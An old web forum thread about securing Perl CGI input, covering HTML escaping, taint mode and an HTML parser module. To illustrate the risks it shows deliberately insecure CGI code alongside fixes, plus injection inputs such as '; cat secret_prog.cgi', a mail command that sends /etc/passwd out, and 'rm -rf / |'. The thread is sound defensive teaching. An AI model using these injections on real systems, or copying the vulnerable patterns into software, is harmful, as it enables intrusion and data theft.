security holes

merlin posted this at 08:22 — 13th December 2000.

Joined: Oct 1999

i need some very basic information. which kind of user-input must be washed from any dangerous 'things'? and how to do that?
i have a mailform, a guestbook-script and a postcard-function on one of my sites, now i was wondering about the risk i'm taking with them... in which situation can user-input be risky?

japhy posted this at 14:01 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

You have several options when accepting text from a form for displaying on an HTML page.

[=1]

(attempt to) remove all HTML tags -- this requires a competent parser (like HTML::Parser, or my YAPE::HTML module), because without a parser, you might get rid of some non-HTML content

(attempt to) remove some HTML tags -- this too requires a parser so that certain tags can be left in, while disallowing others, and since HTML elements can be nested, you can't do this with just a regex

use an alternate tagging syntax -- like most bulletin boards, that use brackets instead of greater/less than signs (this is closely related to the next one, which is...)

[*] escape potentially unsafe characters -- change < to < and > to > and & to &, and you'll be safe
[/=1]

While it would be very cool of you to incorporate a working HTML parser in your guestbook or message board, etc., so that people can use (a select subset of) tags normally, it's probably far easier to use a combination of 3 and 4.

That's what I see practically all forums doing nowadays. My only qualm is that I don't see the forums telling me the precise usage of brackets -- where can I have whitespace? Do I need to escape brackets that aren't to be interpreted as tags? Etc. With HTML parsing, you can be very explicit with instructions: "you are allowed to enter tags normally, but only , , and tags will be recognized".

Ok, that's my spiel.[/]

merlin posted this at 14:31 — 13th December 2000.

They have: 410 posts

Joined: Oct 1999

Quote: Originally posted by japhy
You have several options when accepting text from a form for displaying on an HTML page.

great!

Quote:
[=1]
[*] (attempt to) remove all HTML tags -- this requires a competent parser (like HTML::Parser, or my YAPE::HTML module), because without a parser, you might get rid of some non-HTML content
[/=1]

how do i include such a parser and how do i use it? i think i'll consult my perlbooks...

Quote:
escape potentially unsafe characters -- change < to < and > to > and & to &, and you'll be safe

that sounds great! i'd say this is an 'easy' regexp s/
[/]

japhy posted this at 14:43 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

Another place to take caution is when you use user input in a system command. Take this VERY SIMPLE (and very insecure) CGI program:

#!/usr/bin/perl

use CGI 'param';
my $function = param('perlfunc');
print "Content-type: text/plain\n\n";
print `perldoc -f $function`;

This code is supposed to get the name of a Perl function from a form (the text element is called 'perlfunc'), and then display the information about that function in the 'perlfunc' document. Who can find the security hole?

What if I enter "; ls -lag" as my "perl function"? Now, my program blindly runs perldoc -f; ls -lag, and the user sees the contents of the current directory. Hmm, and since all Perl CGI programs have to be readable by the 'nobody' user, that means that I can see the NAMES of the other CGI programs.

Then I can just send the program "; cat secret_prog.cgi" and now I've seen the contents of THAT program -- I sure hope you don't use plaintext passwords, or you're ruined.

The solution is to use Perl's taint checking. This is available with the -T switch to perl. Taint checking requires you validate input from outside of your program -- this is usually done with a rigorous regex to ensure the right stuff:

#!/usr/bin/perl -T

use CGI 'param';
my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;
# notice the ()'s around $func -- this is important
# a regex in LIST CONTEXT returns parenthesized sub-patterns
# so $func gets set to the valid portion of the string, if any

print "Content-type: text/plain\n\n";
print `perldoc -f $func`;

That program should run... right? Sorry. Perl thinks the environment is unsafe, and requests that you make it safe, too -- specifically, $ENV{PATH}. This is so that YOU run the 'perldoc' program you THINK you're running.

#!/usr/bin/perl -wT

use CGI 'param';
use strict;

# we should always use -w and 'strict' and -T for CGI programs

$ENV{PATH} = "/bin:/usr/bin:/usr/local/bin";

my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;

print "Content-type: text/plain\n\n";
print `perldoc -f $func`;

That runs fine. And, for even more safety, you might want to change that last line to have the full path to 'perldoc', just in case you're paranoid (which you should be).

This is a simplistic example -- the big error I often see is people calling a mail program with the user's email address ON THE COMMAND-LINE. This is just a hole waiting to be exploited:

open MAIL, "| /usr/bin/sendmail $email";

Ouch. I don't think anyone REALLY has an email address of "[email protected]; mail [email protected] < /etc/passwd", but someone SURE could enter that. You're probably best off not trying to validate an email address yourself, but rather, tell sendmail (or whatever client you use) to look in the headers of the message for the To: field:

open MAIL, "| /usr/bin/sendmail -t" or die "can't run sendmail: $!";

That's all for now (again).

Be sure to read the perlsec documentation, which covers tainting in more detail.

japhy posted this at 15:02 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

The simplest mechanism is to set up a translation table:

my %HTML = (
  '<' => 'lt',
  '>' => 'gt',
  '&' => 'amp',
);

Then create a regex based on the keys:

$REx = "[" . join("", keys %HTML) . "]"; # [<>&]

And then use it:

$user_content =~ s/($REx)/&$HTML{$1};/g;

(Notice how I saved the & and ; for the very end, there, instead of putting them in EVERY SINGLE value in the hash.)

There's a module for this already, HTML::Entities, which does even more -- it fixes accented characters and such. It's quite useful and comprehensive.

As far as HTML parsers go, you're not likely to find much about them in your books. I've not used HTML::Parser, but I can tell you how to use my YAPE::HTML module. Once you get the module from http://www.pobox.com/~japhy/YAPE/HTML.pm then you can try this program. This program will spit out the HTML content, and remove ALL TAGS except for , , and .

This can be run as a CGI program OR as a command-line program. This reads a sample HTML file from beneath the __DATA__ marker in the file.

#!/usr/bin/perl -w

use YAPE::HTML;
use strict;

print "Content-type: text/html\n\n" if $ENV{REMOTE_HOST};

my $content;
{ local $/;  $content = <DATA>; }

my $parser = YAPE::HTML->new($content);
my %ok = map +($_, 1), qw( a b i );

while (my $chunk = $parser->next) {
  next if
    $chunk->type eq 'comment' or
    $chunk->type eq 'tag' and not $ok{$chunk->tag} or
    $chunk->type eq 'closetag' and not $ok{$chunk->tag};
  print $chunk->string;
}

__DATA__
This is such a <b>cool</b> site.
<hr>
I hope all this markup gets <i>through</i> ok...
<br><br>
<h2 align="center">Hooray for <a href="http://www.perl.com/">Perl</a>!</h2>
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site

This code, when run, will produce:

This is such a <b>cool</b> site.

I hope all this markup gets <i>through</i> ok...

Hooray for <a href="http://www.perl.com/">Perl</a>!
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site

As you can see, it handles nested elements fine (even if a good element is in a bad element, or vice-versa).

I apologize for the UTTER lack of documentation in the module, but I assure you it will look much better once it is officially released. In the meantime, I offer any and all user support needed. I hope the sample code above is pretty self-explanatory, though.

merlin posted this at 15:27 — 13th December 2000.

They have: 410 posts

Joined: Oct 1999

ou well, i see there's a long way to go... thank you for your help! it'll take some time to learn all the stuff... but another short question for my understanding: it doesn't matter, where (cgi-bin-dir or htdocs-dir) the data is stored? it remains always a security-risk?

japhy posted this at 15:44 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

It is far safer to store your data in a directory NOT accessible from the web. That will make it impossible to be reached from the web UNLESS you provide a person a gateway to get the content, like:

open FILE, $some_path_the_user_enters;

That line is unsafe in and of itself. I could enter "/etc/passwd", or "rm -rf / |", or something else bad. The point is that you should not trust the end user, and should make sure that you are ok with what they give you. Paranoia helps in this case.

Mark Hensler posted this at 03:01 — 14th December 2000.

He has: 4,048 posts

Joined: Aug 2000

um...
Aren't you also suppose to escape $ and @ and %?

if you get user input containing:
"blah $ENV{PATH} blah"

won't it print "blah ", then whatever $ENV{PATH} is, then " blah"?
and same for @arrays and %hases?

Mark Hensler
If there is no answer on Google, then there is no question.

japhy posted this at 03:19 — 14th December 2000.

They have: 161 posts

Joined: Dec 1999

Perl does interpolation only on things in your code. If you run the following Perl program:

#!/usr/bin/perl
$X = 100;
print $ARGV[0];

and run it as perl my_program 'this is $X', you'll get the actual string this is $X, you won't get this is 100.

If that worked, templates would be simple. But Perl would also be terribly insecure.